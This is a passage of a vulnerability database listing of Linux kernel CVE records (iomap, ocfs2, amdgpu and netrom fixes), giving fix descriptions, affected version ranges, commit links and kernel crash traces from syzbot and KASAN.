}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "4.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\niomap: adjust read range correctly for non-block-aligned positions\n\niomap_adjust_read_range() assumes that the position and length passed in\nare block-aligned. This is not always the case however, as shown in the\nsyzbot generated case for erofs. This causes too many bytes to be\nskipped for uptodate blocks, which results in returning the incorrect\nposition and length to read in. If all the blocks are uptodate, this\nunderflows length and returns a position beyond the folio.\n\nFix the calculation to also take into account the block offset when\ncalculating how many bytes can be skipped for uptodate blocks."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-14T08:51:34.049Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/82b60ffbb532d919959702768dca04c3c0500ae5"
},
{
"url": "https://git.kernel.org/stable/c/12053695c8ef5410e8cc6c9ed4c0db9cd9c82b3e"
},
{
"url": "https://git.kernel.org/stable/c/142194fb21afe964d2d194cab1fc357cbf87e899"
},
{
"url": "https://git.kernel.org/stable/c/7aa6bc3e8766990824f66ca76c19596ce10daf3e"
}
],
"title": "iomap: adjust read range correctly for non-block-aligned positions",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68794",
"datePublished": "2026-01-13T15:29:05.553Z",
"dateReserved": "2025-12-24T10:30:51.037Z",
"dateUpdated": "2026-01-14T08:51:34.049Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68771 (GCVE-0-2025-68771)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-19 12:18
VLAI?
EPSS
Title
ocfs2: fix kernel BUG in ocfs2_find_victim_chain
Summary
In the Linux kernel, the following vulnerability has been resolved:
ocfs2: fix kernel BUG in ocfs2_find_victim_chain
syzbot reported a kernel BUG in ocfs2_find_victim_chain() because the
`cl_next_free_rec` field of the allocation chain list (next free slot in
the chain list) is 0, triggring the BUG_ON(!cl->cl_next_free_rec)
condition in ocfs2_find_victim_chain() and panicking the kernel.
To fix this, an if condition is introduced in ocfs2_claim_suballoc_bits(),
just before calling ocfs2_find_victim_chain(), the code block in it being
executed when either of the following conditions is true:
1. `cl_next_free_rec` is equal to 0, indicating that there are no free
chains in the allocation chain list
2. `cl_next_free_rec` is greater than `cl_count` (the total number of
chains in the allocation chain list)
Either of them being true is indicative of the fact that there are no
chains left for usage.
This is addressed using ocfs2_error(), which prints
the error log for debugging purposes, rather than panicking the kernel.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
ccd979bdbce9fba8412beb3f1de68a9d0171b12c , < 1f77e5cd563e6387fdf3bb714fcda36cd88ac5e7
(git)
Affected: ccd979bdbce9fba8412beb3f1de68a9d0171b12c , < d0fd1f732ea8063cecd07a3879b7d815c7ee71ed (git) Affected: ccd979bdbce9fba8412beb3f1de68a9d0171b12c , < b08a33d5f80efe6979a6e8f905c1a898910c21dd (git) Affected: ccd979bdbce9fba8412beb3f1de68a9d0171b12c , < 96f1b074c98c20f55a3b23d2ab44d9fb0f619869 (git) Affected: ccd979bdbce9fba8412beb3f1de68a9d0171b12c , < e24aedae71652d4119049f1fbef6532ccbe3966d (git) Affected: ccd979bdbce9fba8412beb3f1de68a9d0171b12c , < 7acc0390e0dd7474c4451d05465a677d55ad4268 (git) Affected: ccd979bdbce9fba8412beb3f1de68a9d0171b12c , < 039bef30e320827bac8990c9f29d2a68cd8adb5f (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/ocfs2/suballoc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1f77e5cd563e6387fdf3bb714fcda36cd88ac5e7",
"status": "affected",
"version": "ccd979bdbce9fba8412beb3f1de68a9d0171b12c",
"versionType": "git"
},
{
"lessThan": "d0fd1f732ea8063cecd07a3879b7d815c7ee71ed",
"status": "affected",
"version": "ccd979bdbce9fba8412beb3f1de68a9d0171b12c",
"versionType": "git"
},
{
"lessThan": "b08a33d5f80efe6979a6e8f905c1a898910c21dd",
"status": "affected",
"version": "ccd979bdbce9fba8412beb3f1de68a9d0171b12c",
"versionType": "git"
},
{
"lessThan": "96f1b074c98c20f55a3b23d2ab44d9fb0f619869",
"status": "affected",
"version": "ccd979bdbce9fba8412beb3f1de68a9d0171b12c",
"versionType": "git"
},
{
"lessThan": "e24aedae71652d4119049f1fbef6532ccbe3966d",
"status": "affected",
"version": "ccd979bdbce9fba8412beb3f1de68a9d0171b12c",
"versionType": "git"
},
{
"lessThan": "7acc0390e0dd7474c4451d05465a677d55ad4268",
"status": "affected",
"version": "ccd979bdbce9fba8412beb3f1de68a9d0171b12c",
"versionType": "git"
},
{
"lessThan": "039bef30e320827bac8990c9f29d2a68cd8adb5f",
"status": "affected",
"version": "ccd979bdbce9fba8412beb3f1de68a9d0171b12c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/ocfs2/suballoc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.16"
},
{
"lessThan": "2.6.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "2.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "2.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "2.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "2.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "2.6.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: fix kernel BUG in ocfs2_find_victim_chain\n\nsyzbot reported a kernel BUG in ocfs2_find_victim_chain() because the\n`cl_next_free_rec` field of the allocation chain list (next free slot in\nthe chain list) is 0, triggring the BUG_ON(!cl-\u003ecl_next_free_rec)\ncondition in ocfs2_find_victim_chain() and panicking the kernel.\n\nTo fix this, an if condition is introduced in ocfs2_claim_suballoc_bits(),\njust before calling ocfs2_find_victim_chain(), the code block in it being\nexecuted when either of the following conditions is true:\n\n1. `cl_next_free_rec` is equal to 0, indicating that there are no free\nchains in the allocation chain list\n2. `cl_next_free_rec` is greater than `cl_count` (the total number of\nchains in the allocation chain list)\n\nEither of them being true is indicative of the fact that there are no\nchains left for usage.\n\nThis is addressed using ocfs2_error(), which prints\nthe error log for debugging purposes, rather than panicking the kernel."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:18:52.405Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1f77e5cd563e6387fdf3bb714fcda36cd88ac5e7"
},
{
"url": "https://git.kernel.org/stable/c/d0fd1f732ea8063cecd07a3879b7d815c7ee71ed"
},
{
"url": "https://git.kernel.org/stable/c/b08a33d5f80efe6979a6e8f905c1a898910c21dd"
},
{
"url": "https://git.kernel.org/stable/c/96f1b074c98c20f55a3b23d2ab44d9fb0f619869"
},
{
"url": "https://git.kernel.org/stable/c/e24aedae71652d4119049f1fbef6532ccbe3966d"
},
{
"url": "https://git.kernel.org/stable/c/7acc0390e0dd7474c4451d05465a677d55ad4268"
},
{
"url": "https://git.kernel.org/stable/c/039bef30e320827bac8990c9f29d2a68cd8adb5f"
}
],
"title": "ocfs2: fix kernel BUG in ocfs2_find_victim_chain",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68771",
"datePublished": "2026-01-13T15:28:49.272Z",
"dateReserved": "2025-12-24T10:30:51.035Z",
"dateUpdated": "2026-01-19T12:18:52.405Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68793 (GCVE-0-2025-68793)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-13 15:29
VLAI?
EPSS
Title
drm/amdgpu: fix a job->pasid access race in gpu recovery
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: fix a job->pasid access race in gpu recovery
Avoid a possible UAF in GPU recovery due to a race between
the sched timeout callback and the tdr work queue.
The gpu recovery function calls drm_sched_stop() and
later drm_sched_start(). drm_sched_start() restarts
the tdr queue which will eventually free the job. If
the tdr queue frees the job before time out callback
completes, the job will be freed and we'll get a UAF
when accessing the pasid. Cache it early to avoid the
UAF.
Example KASAN trace:
[ 493.058141] BUG: KASAN: slab-use-after-free in amdgpu_device_gpu_recover+0x968/0x990 [amdgpu]
[ 493.067530] Read of size 4 at addr ffff88b0ce3f794c by task kworker/u128:1/323
[ 493.074892]
[ 493.076485] CPU: 9 UID: 0 PID: 323 Comm: kworker/u128:1 Tainted: G E 6.16.0-1289896.2.zuul.bf4f11df81c1410bbe901c4373305a31 #1 PREEMPT(voluntary)
[ 493.076493] Tainted: [E]=UNSIGNED_MODULE
[ 493.076495] Hardware name: TYAN B8021G88V2HR-2T/S8021GM2NR-2T, BIOS V1.03.B10 04/01/2019
[ 493.076500] Workqueue: amdgpu-reset-dev drm_sched_job_timedout [gpu_sched]
[ 493.076512] Call Trace:
[ 493.076515] <TASK>
[ 493.076518] dump_stack_lvl+0x64/0x80
[ 493.076529] print_report+0xce/0x630
[ 493.076536] ? _raw_spin_lock_irqsave+0x86/0xd0
[ 493.076541] ? __pfx__raw_spin_lock_irqsave+0x10/0x10
[ 493.076545] ? amdgpu_device_gpu_recover+0x968/0x990 [amdgpu]
[ 493.077253] kasan_report+0xb8/0xf0
[ 493.077258] ? amdgpu_device_gpu_recover+0x968/0x990 [amdgpu]
[ 493.077965] amdgpu_device_gpu_recover+0x968/0x990 [amdgpu]
[ 493.078672] ? __pfx_amdgpu_device_gpu_recover+0x10/0x10 [amdgpu]
[ 493.079378] ? amdgpu_coredump+0x1fd/0x4c0 [amdgpu]
[ 493.080111] amdgpu_job_timedout+0x642/0x1400 [amdgpu]
[ 493.080903] ? pick_task_fair+0x24e/0x330
[ 493.080910] ? __pfx_amdgpu_job_timedout+0x10/0x10 [amdgpu]
[ 493.081702] ? _raw_spin_lock+0x75/0xc0
[ 493.081708] ? __pfx__raw_spin_lock+0x10/0x10
[ 493.081712] drm_sched_job_timedout+0x1b0/0x4b0 [gpu_sched]
[ 493.081721] ? __pfx__raw_spin_lock_irq+0x10/0x10
[ 493.081725] process_one_work+0x679/0xff0
[ 493.081732] worker_thread+0x6ce/0xfd0
[ 493.081736] ? __pfx_worker_thread+0x10/0x10
[ 493.081739] kthread+0x376/0x730
[ 493.081744] ? __pfx_kthread+0x10/0x10
[ 493.081748] ? __pfx__raw_spin_lock_irq+0x10/0x10
[ 493.081751] ? __pfx_kthread+0x10/0x10
[ 493.081755] ret_from_fork+0x247/0x330
[ 493.081761] ? __pfx_kthread+0x10/0x10
[ 493.081764] ret_from_fork_asm+0x1a/0x30
[ 493.081771] </TASK>
(cherry picked from commit 20880a3fd5dd7bca1a079534cf6596bda92e107d)
Severity ?
No CVSS data available.
Assigner
References
Impacted products
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdgpu/amdgpu_device.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "dac58c012c47cadf337a35eb05d44498c43e5cd0",
"status": "affected",
"version": "a72002cb181f350734108228b24c5d10d358f95a",
"versionType": "git"
},
{
"lessThan": "77f73253015cbc7893fca1821ac3eae9eb4bc943",
"status": "affected",
"version": "a72002cb181f350734108228b24c5d10d358f95a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdgpu/amdgpu_device.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.17"
},
{
"lessThan": "6.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: fix a job-\u003epasid access race in gpu recovery\n\nAvoid a possible UAF in GPU recovery due to a race between\nthe sched timeout callback and the tdr work queue.\n\nThe gpu recovery function calls drm_sched_stop() and\nlater drm_sched_start(). drm_sched_start() restarts\nthe tdr queue which will eventually free the job. If\nthe tdr queue frees the job before time out callback\ncompletes, the job will be freed and we\u0027ll get a UAF\nwhen accessing the pasid. Cache it early to avoid the\nUAF.\n\nExample KASAN trace:\n[ 493.058141] BUG: KASAN: slab-use-after-free in amdgpu_device_gpu_recover+0x968/0x990 [amdgpu]\n[ 493.067530] Read of size 4 at addr ffff88b0ce3f794c by task kworker/u128:1/323\n[ 493.074892]\n[ 493.076485] CPU: 9 UID: 0 PID: 323 Comm: kworker/u128:1 Tainted: G E 6.16.0-1289896.2.zuul.bf4f11df81c1410bbe901c4373305a31 #1 PREEMPT(voluntary)\n[ 493.076493] Tainted: [E]=UNSIGNED_MODULE\n[ 493.076495] Hardware name: TYAN B8021G88V2HR-2T/S8021GM2NR-2T, BIOS V1.03.B10 04/01/2019\n[ 493.076500] Workqueue: amdgpu-reset-dev drm_sched_job_timedout [gpu_sched]\n[ 493.076512] Call Trace:\n[ 493.076515] \u003cTASK\u003e\n[ 493.076518] dump_stack_lvl+0x64/0x80\n[ 493.076529] print_report+0xce/0x630\n[ 493.076536] ? _raw_spin_lock_irqsave+0x86/0xd0\n[ 493.076541] ? __pfx__raw_spin_lock_irqsave+0x10/0x10\n[ 493.076545] ? amdgpu_device_gpu_recover+0x968/0x990 [amdgpu]\n[ 493.077253] kasan_report+0xb8/0xf0\n[ 493.077258] ? amdgpu_device_gpu_recover+0x968/0x990 [amdgpu]\n[ 493.077965] amdgpu_device_gpu_recover+0x968/0x990 [amdgpu]\n[ 493.078672] ? __pfx_amdgpu_device_gpu_recover+0x10/0x10 [amdgpu]\n[ 493.079378] ? amdgpu_coredump+0x1fd/0x4c0 [amdgpu]\n[ 493.080111] amdgpu_job_timedout+0x642/0x1400 [amdgpu]\n[ 493.080903] ? pick_task_fair+0x24e/0x330\n[ 493.080910] ? __pfx_amdgpu_job_timedout+0x10/0x10 [amdgpu]\n[ 493.081702] ? _raw_spin_lock+0x75/0xc0\n[ 493.081708] ? __pfx__raw_spin_lock+0x10/0x10\n[ 493.081712] drm_sched_job_timedout+0x1b0/0x4b0 [gpu_sched]\n[ 493.081721] ? __pfx__raw_spin_lock_irq+0x10/0x10\n[ 493.081725] process_one_work+0x679/0xff0\n[ 493.081732] worker_thread+0x6ce/0xfd0\n[ 493.081736] ? __pfx_worker_thread+0x10/0x10\n[ 493.081739] kthread+0x376/0x730\n[ 493.081744] ? __pfx_kthread+0x10/0x10\n[ 493.081748] ? __pfx__raw_spin_lock_irq+0x10/0x10\n[ 493.081751] ? __pfx_kthread+0x10/0x10\n[ 493.081755] ret_from_fork+0x247/0x330\n[ 493.081761] ? __pfx_kthread+0x10/0x10\n[ 493.081764] ret_from_fork_asm+0x1a/0x30\n[ 493.081771] \u003c/TASK\u003e\n\n(cherry picked from commit 20880a3fd5dd7bca1a079534cf6596bda92e107d)"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:29:04.877Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/dac58c012c47cadf337a35eb05d44498c43e5cd0"
},
{
"url": "https://git.kernel.org/stable/c/77f73253015cbc7893fca1821ac3eae9eb4bc943"
}
],
"title": "drm/amdgpu: fix a job-\u003epasid access race in gpu recovery",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68793",
"datePublished": "2026-01-13T15:29:04.877Z",
"dateReserved": "2025-12-24T10:30:51.037Z",
"dateUpdated": "2026-01-13T15:29:04.877Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68787 (GCVE-0-2025-68787)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
netrom: Fix memory leak in nr_sendmsg()
Summary
In the Linux kernel, the following vulnerability has been resolved:
netrom: Fix memory leak in nr_sendmsg()
syzbot reported a memory leak [1].
When function sock_alloc_send_skb() return NULL in nr_output(), the
original skb is not freed, which was allocated in nr_sendmsg(). Fix this
by freeing it before return.
[1]
BUG: memory leak
unreferenced object 0xffff888129f35500 (size 240):
comm "syz.0.17", pid 6119, jiffies 4294944652
hex dump (first 32 bytes):
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 10 52 28 81 88 ff ff ..........R(....
backtrace (crc 1456a3e4):
kmemleak_alloc_recursive include/linux/kmemleak.h:44 [inline]
slab_post_alloc_hook mm/slub.c:4983 [inline]
slab_alloc_node mm/slub.c:5288 [inline]
kmem_cache_alloc_node_noprof+0x36f/0x5e0 mm/slub.c:5340
__alloc_skb+0x203/0x240 net/core/skbuff.c:660
alloc_skb include/linux/skbuff.h:1383 [inline]
alloc_skb_with_frags+0x69/0x3f0 net/core/skbuff.c:6671
sock_alloc_send_pskb+0x379/0x3e0 net/core/sock.c:2965
sock_alloc_send_skb include/net/sock.h:1859 [inline]
nr_sendmsg+0x287/0x450 net/netrom/af_netrom.c:1105
sock_sendmsg_nosec net/socket.c:727 [inline]
__sock_sendmsg net/socket.c:742 [inline]
sock_write_iter+0x293/0x2a0 net/socket.c:1195
new_sync_write fs/read_write.c:593 [inline]
vfs_write+0x45d/0x710 fs/read_write.c:686
ksys_write+0x143/0x170 fs/read_write.c:738
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xa4/0xfa0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < f77e538ac4e3adb1882d5bccb7bfdc111b5963d3
(git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 09efbf54eeaecebe882af603c9939a4b1bb9567e (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 73839497bbde5cd4fd02bbd9c8bc2640780ae65d (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 156a0f6341dce634a825db49ca20b48b1ae9bcc1 (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 8d1ccba4b171cd504ecfa47349cb9864fc9d687c (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 51f5fbc1681bdcffcc7d18bf3dfdb2b1278d3977 (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 613d12dd794e078be8ff3cf6b62a6b9acf7f4619 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netrom/nr_out.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f77e538ac4e3adb1882d5bccb7bfdc111b5963d3",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "09efbf54eeaecebe882af603c9939a4b1bb9567e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "73839497bbde5cd4fd02bbd9c8bc2640780ae65d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "156a0f6341dce634a825db49ca20b48b1ae9bcc1",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8d1ccba4b171cd504ecfa47349cb9864fc9d687c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "51f5fbc1681bdcffcc7d18bf3dfdb2b1278d3977",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "613d12dd794e078be8ff3cf6b62a6b9acf7f4619",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netrom/nr_out.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetrom: Fix memory leak in nr_sendmsg()\n\nsyzbot reported a memory leak [1].\n\nWhen function sock_alloc_send_skb() return NULL in nr_output(), the\noriginal skb is not freed, which was allocated in nr_sendmsg(). Fix this\nby freeing it before return.\n\n[1]\nBUG: memory leak\nunreferenced object 0xffff888129f35500 (size 240):\n comm \"syz.0.17\", pid 6119, jiffies 4294944652\n hex dump (first 32 bytes):\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00 00 00 00 00 00 00 00 00 10 52 28 81 88 ff ff ..........R(....\n backtrace (crc 1456a3e4):\n kmemleak_alloc_recursive include/linux/kmemleak.h:44 [inline]\n slab_post_alloc_hook mm/slub.c:4983 [inline]\n slab_alloc_node mm/slub.c:5288 [inline]\n kmem_cache_alloc_node_noprof+0x36f/0x5e0 mm/slub.c:5340\n __alloc_skb+0x203/0x240 net/core/skbuff.c:660\n alloc_skb include/linux/skbuff.h:1383 [inline]\n alloc_skb_with_frags+0x69/0x3f0 net/core/skbuff.c:6671\n sock_alloc_send_pskb+0x379/0x3e0 net/core/sock.c:2965\n sock_alloc_send_skb include/net/sock.h:1859 [inline]\n nr_sendmsg+0x287/0x450 net/netrom/af_netrom.c:1105\n sock_sendmsg_nosec net/socket.c:727 [inline]\n __sock_sendmsg net/socket.c:742 [inline]\n sock_write_iter+0x293/0x2a0 net/socket.c:1195\n new_sync_write fs/read_write.c:593 [inline]\n vfs_write+0x45d/0x710 fs/read_write.c:686\n ksys_write+0x143/0x170 fs/read_write.c:738\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xa4/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:03.559Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f77e538ac4e3adb1882d5bccb7bfdc111b5963d3"
},
{
